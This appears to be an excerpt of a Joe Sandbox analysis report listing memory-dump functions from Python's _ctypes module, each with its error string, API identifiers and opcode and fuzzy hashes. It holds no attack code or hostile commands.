                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_LongLong_MaskStringUnicode_Unsigned
                                                                                                                                                                                                                          • String ID: function name must be string, bytes object or integer
                                                                                                                                                                                                                          • API String ID: 2115587880-3177123413
                                                                                                                                                                                                                          • Opcode ID: 25a9809bc0b9a84059b6088b3c6c508c1e875b89492b4433713f89c9c7ab522e
                                                                                                                                                                                                                          • Instruction ID: c8fc017e3be139365b0bea0cae146da9e9c582c13729d5b71627d2c5ce603e19
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25a9809bc0b9a84059b6088b3c6c508c1e875b89492b4433713f89c9c7ab522e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101A422B1AB06C1FB195FEED8545793751AF88BD5F048430C64D86B61DE3CA091C300
                                                                                                                                                                                                                          Function 00007FF8BFB79CE4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$Long_OccurredStringVoid
                                                                                                                                                                                                                          • String ID: integer expected
                                                                                                                                                                                                                          • API String ID: 1621529885-2140524511
                                                                                                                                                                                                                          • Opcode ID: d7e12a5a84ba3b5816ac9245441cbdfbdf4e16f5050b299c09b493440ede2c38
                                                                                                                                                                                                                          • Instruction ID: 02f20f89c3e2a541b11cc061e7f4bb7de644fd4d0139b18c3547fe31c6ccedb6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7e12a5a84ba3b5816ac9245441cbdfbdf4e16f5050b299c09b493440ede2c38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18F05E21B0D74791EE049F9AE5442796760EF89FD4F589030DB4E07765DE2CD484C700
                                                                                                                                                                                                                          Function 00007FF8BFB7EEAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_StringSubtypeType_
                                                                                                                                                                                                                          • String ID: not a ctype instance
                                                                                                                                                                                                                          • API String ID: 468607378-3181906287
                                                                                                                                                                                                                          • Opcode ID: 08d198a72780ece662508876f4f51f37c6adf97046b3b81eb31e04160cb7e3f3
                                                                                                                                                                                                                          • Instruction ID: 9ab8f65b42db5729d35775e339b45b8d5cef805d3c1252d435e0dd55611af60a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08d198a72780ece662508876f4f51f37c6adf97046b3b81eb31e04160cb7e3f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C70129A6A09B4691EB508FA9E4400787760FF88BD8B548931DF4D8BB69DF3CE490C300
                                                                                                                                                                                                                          Function 00007FF8BFB7B28C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dict_Err_ItemString
                                                                                                                                                                                                                          • String ID: abstract class
                                                                                                                                                                                                                          • API String ID: 960913676-1623945838
                                                                                                                                                                                                                          • Opcode ID: 07c45d1470a683c08f1dd7549840009edc2de2ed2696f7d1a0a357b19f8bdd29
                                                                                                                                                                                                                          • Instruction ID: 3f7153ded6004e33bffd4b4049b76bb3ca8492fdc17a6c37690cf542ec8b49c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07c45d1470a683c08f1dd7549840009edc2de2ed2696f7d1a0a357b19f8bdd29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0F04420A09B0780EA549FEDF8900792760AF85BD4B589631DB2E477E6DE2CE455C700
                                                                                                                                                                                                                          Function 00007FF8BFB7CEA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Dict_Err_ErrorItemOccurredWith
                                                                                                                                                                                                                          • String ID: getting _needs_com_addref_
                                                                                                                                                                                                                          • API String ID: 2359299079-4140119658
                                                                                                                                                                                                                          • Opcode ID: 26c22734314908c9c5a6b304ba70b9f3844488a006614a608f28ba05d0495ae1
                                                                                                                                                                                                                          • Instruction ID: b1d6db4d7ae71b17001d23bed0afc16b431f707aafcdbe9389a626131d5634f7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26c22734314908c9c5a6b304ba70b9f3844488a006614a608f28ba05d0495ae1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF0C992B1A64681FE699BDDD49417827A0EF88FC4B588439CB1D26761DE2CE894C314
                                                                                                                                                                                                                          Function 00007FF8BFB7DED4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_StringSubtypeType_
                                                                                                                                                                                                                          • String ID: invalid type
                                                                                                                                                                                                                          • API String ID: 468607378-446110543
                                                                                                                                                                                                                          • Opcode ID: 8368d9254fdd679526cd1a9d5725e2dd1d9492e1c54c901f5b1e911c6c4889d0
                                                                                                                                                                                                                          • Instruction ID: de31844d016720c2575c8bde12507a7ec4c53838c96dcff797b3c21146f17ccd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8368d9254fdd679526cd1a9d5725e2dd1d9492e1c54c901f5b1e911c6c4889d0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF0ED61B0AA06C1EF149FAAE89007423A1FFC8FD4F445431CB1E8B651EE2CD4D5C304
                                                                                                                                                                                                                          Function 00007FF8BFB7408C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Err_$OccurredString
                                                                                                                                                                                                                          • String ID: PyObject is NULL
                                                                                                                                                                                                                          • API String ID: 114435612-3221357749
                                                                                                                                                                                                                          • Opcode ID: c3a842dcbd350af876c7cc5921dc1184f5b268ea4e277cc45085e60c13a99c40
                                                                                                                                                                                                                          • Instruction ID: e0165e80148f28ebd18b6137ac6dbbfdb65da5977fafc47e12f0e2133e68aecf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3a842dcbd350af876c7cc5921dc1184f5b268ea4e277cc45085e60c13a99c40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E0B620A0AA43C1EE159FADD88017827A0BF88BD5BA48836CB0E8A351EE2CF005C300
                                                                                                                                                                                                                          Function 00007FF8BFB7FCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2282859604.00007FF8BFB71000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282778148.00007FF8BFB70000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282989797.00007FF8BFB81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283049234.00007FF8BFB88000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2283159307.00007FF8BFB8C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8bfb70000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Capsule_FreeMem_Pointer
                                                                                                                                                                                                                          • String ID: _ctypes/cfield.c pymem
                                                                                                                                                                                                                          • API String ID: 1268649101-2578739719
                                                                                                                                                                                                                          • Opcode ID: 09e8de93bb7fc27e010d1e423826d773f5fd79115a19586fecd86bd959678d95
                                                                                                                                                                                                                          • Instruction ID: 27f50745aa19c0ba0568b8a77117bebdcc5d5021d2850e03df08ce00328702e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09e8de93bb7fc27e010d1e423826d773f5fd79115a19586fecd86bd959678d95
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CC00260E2B642D2EE18ABDDB88512413A5AF84BC5F981434CA0D07666EE2CA659D714